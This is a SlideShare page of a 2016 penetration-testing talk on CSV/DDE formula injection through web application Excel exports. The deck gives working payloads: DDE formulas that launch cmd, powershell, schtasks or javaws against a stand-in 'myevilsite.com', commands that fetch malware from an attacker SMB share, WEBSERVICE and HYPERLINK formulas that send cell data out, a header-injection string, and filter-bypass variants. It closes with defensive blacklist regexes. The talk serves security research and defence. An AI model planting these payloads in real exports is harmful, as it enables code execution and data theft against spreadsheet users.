SlideShare a Scribd company logo
1 of 26
Tricks to Improve Web App
Excel Export Attacks
Jerome Smith
CamSec September 2016
whoami
• In computer security for y years
• Pentester for p years
• At NCC Group for n years
• Where y  2p and p  2n and 2n + 5  y
• CREST CCT (App)
• Presented at BSides Manchester 2014 and 2016
• exploresecurity.com && @exploresecurity
2
By way of an agenda
1. Web application Excel export
2. What to look out for
3. The DDE trick
4. Can we improve the attack?
3
4
Web application Excel export
• Users submit data to application
• Data is stored
• Elsewhere that data can be exported in Excel format
• CSV
• XLS
• XLSX
• User has at least some control over the contents
• Usually there’s a “template” with certain cells filled with user input
• That’s where things get interesting
• Wacky variations
• e.g. data to be exported was sent to client in a form and POSTed back!
5
Request-response
• Request
http://app/export.asp?p=year&y=2016&f=csv
• Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Thu, 29 Sep 2016 18:30:00 GMT
Content-Type: text/html
Content-Disposition: attachment; filename="Year2016.csv"
Cache-control: public
Content-Length: 9255
Connection: close
2016 Report
Exported by,Jerome
...
What’s of interest here?
6
Some things to look out for
• Force format (more on this later)
f=xls → f=csv or app/export/xls/ → app/export/csv/
• Unauthenticated access
• Content-Type incorrect, esp. text/html → XSS?
• Unless Content-Disposition: attachment is present
• Header injection
f=csv"%0d%0aSet-Cookie:%20AUTH%3dABCDEF0123456789%0d%0aX:%20%22
Content-Disposition: attachment; filename="Year2016.csv"
Set-Cookie: AUTH=ABCDEF0123456789
X: ""
• Usefulness of Set-Cookie depends on other factors
• Cache-control directive
• Caching depends on content, context and browser
7
The DDE trick
• Dynamic Data Exchange (DDE) is an old Microsoft technology
• Facilitates data transfer between applications
• A form of Inter-Process Communication (IPC)
• Security risks of Excel export first widely publicised 2014 by @albinowax
http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
• Consider a spreadsheet cell:
=cmd|'/c calc'!A0
service | topic ! item
• How about
• cmd /c <attacker_IPevil$malware.exe
• cmd /c net use <attacker_IP>c$
• An ISP should block outbound SMB ports
8
Typical warnings
(1)
(2a)
(3)
(2b)
Users and warnings – Piranha
44% clicked through warnings
70% clicked through warnings
75% clicked through warnings
10
Source of warnings
• Setting is a property of the file
• Only effective if file has been trusted previously
• Two stage attack (low and slow)?
• Benign payload =NotASheet!A1
• Malicious payload
11
Trusted Documents
(1)
(2a)
Only the filename is stored
Downloads with static filenames are of interest
Once “trusted” if the file’s start-up prompt is set to auto-update,
only the third warning (CMD.EXE) is displayed
12
Excel file format
XLSX vs XLS vs CSV
• Sometimes user can influence format, recall f=xls → f=csv
• CSV: no Protected View warning
• CSV: can’t contain start-up prompt auto-update setting
CSV format in XLS file
• Less likely outcome – one of those wacky variations!
• Format warning instead of Protected View warning
• Formal security warnings (1) and (2a) not shown
• Therefore file cannot be not “trusted” in the registry
• Curiously CSV format not supported: tab or CRLF cell delimiter
13
That CMD.EXE warning
Built-in Excel functions
• Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here")
• Limited info about the system e.g. current directory
=INFO("DIRECTORY"), Excel version =INFO("RELEASE")
• =WEBSERVICE(URL)
• Sadly doesn’t support authentication (i.e. force NTLM authentication)
• Or file paths (local or UNC) or file://
• But it will steal data without user interaction (unlike HYPERLINK)
=WEBSERVICE("http://myevilsite.com/?data="&A1)
• =FILTERXML(XML, XPATH)
• Any XXE or parsing bugs?
14
Alternatives to cmd.exe
• =powershell|'Test-Connection 127.0.0.1'!A0
Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula
=cmd|'/k powershell Test-Connection 127.0.0.1'!A0
• PATHEXT environment variable ignored – .exe only
• .exe files in PATH where filename <= 12 characters
=explorer|'https://nccgroup.trust'!A0
=schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0
=javaws|'http://myevilsite.com/malware.jnlp'!A0
=rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0
• N.B. if Excel is 32-bit, then the program will be run as such, etc.
15
Native DDE services – 1/2
Tcl (Tool Command Language)
• dde services "" ""
{Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}}
{Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders
AppProperties} {PROGMAN PROGMAN}
Demo
• Commands you just saw
dde request excel Sheet1 r1c1:r2c3
dde execute excel Sheet1 {[formula("overwrite","r1c1")]}
dde execute excel Sheet1 {[file.delete("e:test")]}
dde execute excel Sheet1 {[alert("hello")][alert("world")]}
• Shame this doesn’t work 
dde execute excel Sheet1 {[exec("c:windowssystem32calc.exe")]}
16
Native DDE services – 2/2
Progman
• dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]}
Folders (=Shell?)
• dde execute Folders AppProperties {[ViewFolder("","attacker_IPc$",2)]}
What about in Excel?
• This could save you hours: when testing, if Excel hangs, try closing Tcl
• =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}' 
• That Tcl service-topic list isn’t complete…
17
DDESpy
• Part of Visual Studio 6 (!)
• Must be running when application launches
18
iexplore DDE
• =iexplore|WWW_OpenURL!exploresecurity.com
• No (3) “remote data not accessible” warning
• Slice of BeEF anyone?
• =iexplore|WWW_OpenURL!'<attacker_IP>c$'
• =iexplore|WWW_OpenURL!'c:windowssystem32cmd.exe'
• No better than where we were really!
• No obvious way to include switches anyway – a limitation of file://
19
firefox DDE
• =firefox|WWW_OpenURL!exploresecurity.com 
=firefox|WWW_OpenURL!'http://exploresecurity.com' 
=firefox|WWW_OpenURL!'http://exploresecurity.com/' 
• =firefox|WWW_GetWindowInfo!foo
20
Demo
(1) No Protective View warning as CSV
(2) Just “Enable Content” warning as DDE call succeeded
• Background navigation to phishing site could be very effective
(3) No warnings – exactly which stars were aligned there?!
• A file with same name previously downloaded
• Had content to elicit warnings, which were accepted
• So it’s now “trusted”
• Previous file need not have been malicious – remember
=NotASheet!A1
• Malicious file’s start-up prompt set to auto-update links
21
Bypassing filters
• Original article stated prefix cells starting with = with '
• This will “cast” the cell as text in XLS[X] and stop execution in CSV
• We know better now
• Imagine the blacklist ^=[A-Za-z].*
• How about:
+cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0
=cmd|'/k ipconfig'!A0
@SUM(cmd|'/k ipconfig'!A0)
"=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0
=(cmd|'/k ipconfig'!A0)
=0-cmd|'/k ipconfig'!A0
22
Lessons
• Check out any Excel export that returns user-supplied data
• CSV is not a benign format
• DDE ≠ macro
• Input validation blacklists may not be robust
• Much of this stuff applies to red-teaming
• Excel documents as email attachments
• In some cases it may be possible to cut down the Excel warnings
• Excel may have more to give in this area
• The old stuff often comes back to bite us!
• Work in progress – do explore...
23
Where now?
• Enumerate DDE surface area – services + topics + items
• Poorly documented
• iexplore c:WindowsSystem32ieframe.dll
• firefox c:Program Files (x86)Mozilla Firefoxxul.dll
• Progman/Shell/Folders c:WindowsSystem32shell32.dll
• Progman/Shell/Folders attractive as they’re always running
• But are they exploitable via Excel?
• dde execute Folders AppProperties {[ViewFolder("","c:windows",1)]}
• =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'
• =iexplore|WWW_OpenURL!'exploresecurity.com?a={[ViewFolder("","c:win
dows",1)]}' → http://www.exploresecurity.com/?a=ViewFolder
• =firefox|WWW_OpenURL!'http://exploresecurity.com?a={[ViewFolder("","
c:windows",1)]}' → http://exploresecurity.com/?a={[ViewFolder(
• =cmd|'/k echo {[ViewFolder("","c:windows",1)]}'!A0 →
{[ViewFolder("","c:windows",1)]}
24
The R&D brick wall
Or this?
Is it because of this?
25
Defence
• Blacklists can be difficult to get right – this should not be a new lesson!
• Validation against a strict whitelist of “known good” should always be the go-
to defensive strategy
• Consider length, character types, format
• Otherwise e.g. for XLS[X] consider always prefixing user input with '
• This may break some numerical operations on those cells but if you’re
expecting a number then see above!
• Trouble with ' for CSV is that it’s visible
• If you have to use a blacklist, don’t be too strict
• In the vast majority of cases, “normal” input still won’t match, e.g. (and
I hate to do it  but people have asked)
^W.+|.+!.+ // DDE
^W.+(.+) // formulae
Use at your own risk and they’ll probably change one day!
26
Fin
Any questions?
exploresecurity.com
@exploresecurity
jeromesmith.uk
@MrJeromeSmith
Tip of the hat to… James @albinowax
Cara @bones_codes
Michael Roberts
Andy @ZephrFish
Raquel Alvarez

More Related Content

Viewers also liked

Malicious file upload attacks - a case study
Malicious file upload attacks - a case studyMalicious file upload attacks - a case study
Malicious file upload attacks - a case studyOktawian Powazka
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...Amazon Web Services
 
SSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfSSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfYurii Bilyk
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
hbstudy# 28 SELinux HandsOn 公開版
hbstudy# 28 SELinux HandsOn 公開版hbstudy# 28 SELinux HandsOn 公開版
hbstudy# 28 SELinux HandsOn 公開版Hiroki Ishikawa
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 
Railway Oriented Programming
Railway Oriented ProgrammingRailway Oriented Programming
Railway Oriented ProgrammingScott Wlaschin
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 

Viewers also liked (12)

Malicious file upload attacks - a case study
Malicious file upload attacks - a case studyMalicious file upload attacks - a case study
Malicious file upload attacks - a case study
 
Poodle
PoodlePoodle
Poodle
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
 
SSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfSSL/POODLE: History repeats itself
SSL/POODLE: History repeats itself
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 
SSLv3 and POODLE
SSLv3 and POODLESSLv3 and POODLE
SSLv3 and POODLE
 
Ssl attacks
Ssl attacksSsl attacks
Ssl attacks
 
hbstudy# 28 SELinux HandsOn 公開版
hbstudy# 28 SELinux HandsOn 公開版hbstudy# 28 SELinux HandsOn 公開版
hbstudy# 28 SELinux HandsOn 公開版
 
Poodle
PoodlePoodle
Poodle
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Railway Oriented Programming
Railway Oriented ProgrammingRailway Oriented Programming
Railway Oriented Programming
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 

Similar to CamSec Sept 2016 - Tricks to improve web app excel export attacks

Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionDefconRussia
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 
Reversing Engineering: Dissecting a "Client Side" Vulnerability in the APT era
Reversing Engineering: Dissecting a "Client Side" Vulnerability in the APT eraReversing Engineering: Dissecting a "Client Side" Vulnerability in the APT era
Reversing Engineering: Dissecting a "Client Side" Vulnerability in the APT eraNelson Brito
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesLeo Loobeek
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok   Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok Docker, Inc.
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon chinaPeter Hlavaty
 
Learn Electron for Web Developers
Learn Electron for Web DevelopersLearn Electron for Web Developers
Learn Electron for Web DevelopersKyle Cearley
 
Drupal 6 to 7 migration
Drupal 6 to 7 migrationDrupal 6 to 7 migration
Drupal 6 to 7 migrationAdelle Frank
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangChris McEniry
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 

Similar to CamSec Sept 2016 - Tricks to improve web app excel export attacks (20)

Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
Reversing Engineering: Dissecting a "Client Side" Vulnerability in the APT era
Reversing Engineering: Dissecting a "Client Side" Vulnerability in the APT eraReversing Engineering: Dissecting a "Client Side" Vulnerability in the APT era
Reversing Engineering: Dissecting a "Client Side" Vulnerability in the APT era
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying Techniques
 
Securing the Container Pipeline
Securing the Container PipelineSecuring the Container Pipeline
Securing the Container Pipeline
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok   Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
Containers and Security for DevOps
Containers and Security for DevOpsContainers and Security for DevOps
Containers and Security for DevOps
 
Learn Electron for Web Developers
Learn Electron for Web DevelopersLearn Electron for Web Developers
Learn Electron for Web Developers
 
Drupal 6 to 7 migration
Drupal 6 to 7 migrationDrupal 6 to 7 migration
Drupal 6 to 7 migration
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 

Recently uploaded

Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dashnarutouzumaki53779
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesSanjay Willie
 

Recently uploaded (20)

Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
 

CamSec Sept 2016 - Tricks to improve web app excel export attacks

  • 1. Tricks to Improve Web App Excel Export Attacks Jerome Smith CamSec September 2016
  • 2. whoami • In computer security for y years • Pentester for p years • At NCC Group for n years • Where y  2p and p  2n and 2n + 5  y • CREST CCT (App) • Presented at BSides Manchester 2014 and 2016 • exploresecurity.com && @exploresecurity 2
  • 3. By way of an agenda 1. Web application Excel export 2. What to look out for 3. The DDE trick 4. Can we improve the attack? 3
  • 4. 4 Web application Excel export • Users submit data to application • Data is stored • Elsewhere that data can be exported in Excel format • CSV • XLS • XLSX • User has at least some control over the contents • Usually there’s a “template” with certain cells filled with user input • That’s where things get interesting • Wacky variations • e.g. data to be exported was sent to client in a form and POSTed back!
  • 5. 5 Request-response • Request http://app/export.asp?p=year&y=2016&f=csv • Response HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Date: Thu, 29 Sep 2016 18:30:00 GMT Content-Type: text/html Content-Disposition: attachment; filename="Year2016.csv" Cache-control: public Content-Length: 9255 Connection: close 2016 Report Exported by,Jerome ... What’s of interest here?
  • 6. 6 Some things to look out for • Force format (more on this later) f=xls → f=csv or app/export/xls/ → app/export/csv/ • Unauthenticated access • Content-Type incorrect, esp. text/html → XSS? • Unless Content-Disposition: attachment is present • Header injection f=csv"%0d%0aSet-Cookie:%20AUTH%3dABCDEF0123456789%0d%0aX:%20%22 Content-Disposition: attachment; filename="Year2016.csv" Set-Cookie: AUTH=ABCDEF0123456789 X: "" • Usefulness of Set-Cookie depends on other factors • Cache-control directive • Caching depends on content, context and browser
  • 7. 7 The DDE trick • Dynamic Data Exchange (DDE) is an old Microsoft technology • Facilitates data transfer between applications • A form of Inter-Process Communication (IPC) • Security risks of Excel export first widely publicised 2014 by @albinowax http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/ • Consider a spreadsheet cell: =cmd|'/c calc'!A0 service | topic ! item • How about • cmd /c <attacker_IPevil$malware.exe • cmd /c net use <attacker_IP>c$ • An ISP should block outbound SMB ports
  • 9. Users and warnings – Piranha 44% clicked through warnings 70% clicked through warnings 75% clicked through warnings
  • 10. 10 Source of warnings • Setting is a property of the file • Only effective if file has been trusted previously • Two stage attack (low and slow)? • Benign payload =NotASheet!A1 • Malicious payload
  • 11. 11 Trusted Documents (1) (2a) Only the filename is stored Downloads with static filenames are of interest Once “trusted” if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed
